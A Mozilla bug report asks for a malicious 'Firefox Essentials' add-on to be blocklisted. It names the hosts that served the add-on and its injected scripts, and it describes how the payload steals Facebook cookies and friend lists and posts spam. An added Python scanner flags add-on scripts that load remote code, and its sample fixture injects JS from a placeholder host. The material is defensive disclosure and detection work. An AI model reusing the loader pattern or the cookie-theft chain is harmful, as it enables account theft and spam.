Bug 724691
Opened 13 years ago
Closed 13 years ago
Malicious "Firefox Essentials" add-on
Categories: Toolkit :: Blocklist Policy Requests, defect
Status: RESOLVED FIXED
People
(Reporter: mhammell, Assigned: jorgev)
Attachments: 1 file (80.69 KB, application/octet-stream)
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7
Steps to reproduce:
Downloaded add-on from http://lacolom[.]be/fbs.xpi
Actual results:
The add-on injects JS to inject http://lacolom.be/g.js, which injects http://www.lacolom.be/oepp.php as JS.
oepp.php:
Steals your cookies
Steals your friend list via /ajax/typeahead/first_degree.php
Picks one of the following bit.ly URLs:
Posts it as a status update via /ajax/updatestatus.php, and mentions your friends.
Picks one of the following bit.ly URLs:
Posts it as an update to your timeline via /ajax/ufi/modify.php
Picks one of the following FB pages:
and has you post about it via /ajax/ufi/modify.php.
Expected results:
It shouldn't steal your cookies and post to Facebook on your behalf without your consent.
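The report describes an add-on that carries only a loader and fetches its payload from a remote host, so one useful review check is to flag packaged scripts that both load code dynamically and name a remote URL. The following is an added example, not part of the bug report or of Mozilla's tooling; the function names, the regex heuristics, the nested-JAR layout and the host `cdn.example.invalid` are assumptions constructed for illustration.

```python
import io
import re
import zipfile

# Archive members worth scanning for script content (assumed legacy XPI layout).
SCRIPT_EXTS = (".js", ".jsm", ".xul", ".html", ".htm")
# Absolute http(s) URLs; group 1 captures the host part.
URL_RE = re.compile(r"""https?://([^\s/'"<>):]+)[^\s'"<>)]*""", re.I)
# Heuristic signs that a file loads code dynamically rather than just linking out.
LOADER_RE = re.compile(
    r"createElement\(\s*['\"]script['\"]|<script[^>]+src=|loadSubScript|\beval\(", re.I)

def scan_xpi(data, allowed_hosts=()):
    """Return sorted (member, host, url) for remote URLs in files that also load script."""
    findings = set()
    with zipfile.ZipFile(io.BytesIO(data)) as xpi:
        for name in xpi.namelist():
            if name.lower().endswith(".jar"):
                # chrome/ content may be packed in a nested JAR, which is also a zip.
                nested = scan_xpi(xpi.read(name), allowed_hosts)
                findings |= {(f"{name}!{m}", h, u) for m, h, u in nested}
                continue
            if not name.lower().endswith(SCRIPT_EXTS):
                continue
            text = xpi.read(name).decode("utf-8", errors="replace")
            if not LOADER_RE.search(text):
                continue  # URLs without a loader are ordinary links, not code loads
            for match in URL_RE.finditer(text):
                host = match.group(1).lower()
                if host not in allowed_hosts:
                    findings.add((name, host, match.group(0)))
    return sorted(findings)

def build_sample_xpi():
    """Constructed sample: an XPI whose overlay script pulls JS from a remote host."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as jar:
        jar.writestr("content/overlay.js",
                     "var s = doc.createElement('script');\n"
                     "s.src = 'http://cdn.example.invalid/g.js';\n"
                     "doc.body.appendChild(s);\n")
        jar.writestr("content/about.js", "var home = 'https://www.mozilla.org/';\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as xpi:
        xpi.writestr("install.rdf", "<RDF><!-- constructed manifest --></RDF>")
        xpi.writestr("chrome/sample.jar", inner.getvalue())
    return outer.getvalue()

if __name__ == "__main__":
    for member, host, url in scan_xpi(build_sample_xpi()):
        print(f"{member}: loads remote content from {host} ({url})")
```

A hit is a prompt for manual review, not a verdict: static matching misses URLs that are assembled at runtime.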
Comment 1 (Assignee) • 13 years ago
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Comment 2 (Assignee) • 13 years ago
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Updated • 9 years ago
Product: addons.mozilla.org → Toolkit